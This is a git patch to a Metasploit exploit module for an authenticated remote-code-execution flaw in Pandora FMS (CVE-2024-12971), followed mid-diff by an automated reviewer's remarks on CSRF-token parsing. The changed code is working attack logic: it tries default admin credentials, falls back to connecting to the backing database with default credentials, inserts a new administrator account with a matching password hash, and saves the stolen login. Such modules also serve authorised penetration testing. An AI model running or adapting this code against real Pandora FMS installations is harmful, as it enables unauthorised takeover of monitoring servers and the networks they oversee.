From 40ba981c982aac9222d1ee7a3aa7cc8a1efbcdfd Mon Sep 17 00:00:00 2001
From: h00die-gr3y
Date: Mon, 7 Apr 2025 14:29:51 +0000
Subject: [PATCH] update based on reviewer suggestions

---
 .../pandora_fms_auth_rce_cve_2024_12971.rb | 39 +++++++++++--------
 1 file changed, 23 insertions(+), 16 deletions(-)

diff --git a/modules/exploits/linux/http/pandora_fms_auth_rce_cve_2024_12971.rb b/modules/exploits/linux/http/pandora_fms_auth_rce_cve_2024_12971.rb
index c17507399f..98c83b26ac 100644
--- a/modules/exploits/linux/http/pandora_fms_auth_rce_cve_2024_12971.rb
+++ b/modules/exploits/linux/http/pandora_fms_auth_rce_cve_2024_12971.rb
@@ -181,8 +181,15 @@ class MetasploitModule < Msf::Exploit::Remote
 # scrape
 html = res.get_html_document
 csrf_code_html = html.at('input[@id="hidden-csrf_code"]')
- vprint_status("csrf_code: #{csrf_code_html}")
- csrf_code = csrf_code_html.attribute_nodes[3] unless csrf_code_html.nil? || csrf_code_html.blank?
+ vprint_status("csrf_code_html: #{csrf_code_html}")
+
+ csrf_attributes = csrf_code_html&.attributes
+ return false unless csrf_attributes
+
+ csrf_code = csrf_attributes['value']
+ return false unless csrf_code
+
+ vprint_status("csrf_code: #{csrf_code}")
 
 # second login POST request using the csrf code
 # csrf_code can be nil in older versions where the csrf_code is not implemented
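Review bot: The two new `return false` guards make the login fail whenever the `hidden-csrf_code` input is absent, which contradicts the comment retained on the last line of the hunk saying `csrf_code` can be nil on older versions that do not implement it; either that comment is now stale or those versions can no longer be logged into by this path. If nil is still a valid outcome, read the attribute through the node's hash accessor instead of bailing out, `csrf_code = csrf_code_html&.[]('value')`, and let the second POST handle a nil value as the comment says it does; otherwise drop that comment and state the new requirement, e.g. `# a csrf_code input is required; login is aborted when it is missing`. Separately, `csrf_attributes['value']` yields an attribute object rather than a plain string if `get_html_document` returns a Nokogiri document (it only reads correctly through interpolation), whereas `csrf_code_html['value']` returns the string value directly. The enclosing method starts before and continues after the hunk.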
@@ -315,18 +322,18 @@ class MetasploitModule < Msf::Exploit::Remote @vuln_path_setting = 'chromium_path' if @vuln_path_setting.nil? # check if we can login at the Pandora Web application with the default admin credentials - @username = datastore['USERNAME'] - @password = datastore['PASSWORD'] - print_status("Trying to log in with admin credentials #{@username}:#{@password} at the Pandora FMS Web application.") - unless pandora_login(@username, @password) + username = datastore['USERNAME'] + password = datastore['PASSWORD'] + print_status("Trying to log in with admin credentials #{username}:#{password} at the Pandora FMS Web application.") + unless pandora_login(username, password) # connect to the PostgreSQL DB with default credentials print_status('Logging in with admin credentials failed. Trying to connect to the Pandora MySQL server.') mysql_login_res = mysql_login(datastore['RHOSTS'], datastore['DB_USER'], datastore['DB_PASSWORD'], datastore['DB_NAME'], datastore['DB_PORT']) fail_with(Failure::Unreachable, "Unable to connect to the MySQL server on port #{datastore['DB_PORT']}.") unless mysql_login_res # add a new admin user - @username = Rex::Text.rand_text_alphanumeric(5..8).downcase - @password = Rex::Text.rand_password + username = Rex::Text.rand_text_alphanumeric(5..8).downcase + password = Rex::Text.rand_password # check the password hash algorithm by reading the password hash of the admin user # new pandora versions hashes the password in bcrypt $2*$, Blowfish (Unix) format else it is a plain MD5 hash 
@@ -334,23 +341,23 @@ class MetasploitModule < Msf::Exploit::Remote fail_with(Failure::BadConfig, 'Cannot find admin credentials to determine password hash algorithm.') if mysql_query_res == false || mysql_query_res.size != 1 hash = mysql_query_res.fetch_hash if hash['password'].match(/^\$2.\$/) - password_hash = Password.create(@password) + password_hash = Password.create(password) else - password_hash = Digest::MD5.hexdigest(@password) + password_hash = Digest::MD5.hexdigest(password) end - print_status("Creating new admin user with credentials #{@username}:#{@password} for access at the Pandora FMS Web application.") - mysql_query_res = mysql_query("INSERT INTO tusuario (id_user, password, is_admin) VALUES (\'#{@username}\', \'#{password_hash}\', '1');") - fail_with(Failure::BadConfig, "Adding new admin credentials #{@username}:#{@password} to the database failed.") if mysql_query_res == false + print_status("Creating new admin user with credentials #{username}:#{password} for access at the Pandora FMS Web application.") + mysql_query_res = mysql_query("INSERT INTO tusuario (id_user, password, is_admin) VALUES (\'#{username}\', \'#{password_hash}\', '1');") + fail_with(Failure::BadConfig, "Adding new admin credentials #{username}:#{password} to the database failed.") if mysql_query_res == false # log in with the new admin user credentials at the Pandora FMS Web application - print_status("Trying to log in with new admin credentials #{@username}:#{@password} at the Pandora FMS Web application.") - fail_with(Failure::NoAccess, 'Failed to authenticate at the Pandora FMS application.') unless pandora_login(@username, @password) + print_status("Trying to log in with new admin credentials #{username}:#{password} at the Pandora FMS Web application.") + fail_with(Failure::NoAccess, 'Failed to authenticate at the Pandora FMS application.') unless pandora_login(username, password) end print_status('Succesfully authenticated at the Pandora FMS Web application.') # storing 
credentials at the msf database print_status('Saving admin credentials at the msf database.') - store_valid_credential(user: @username, private: @password) + store_valid_credential(user: username, private: password) print_status("Executing #{target.name} for #{datastore['PAYLOAD']}") case target['Type']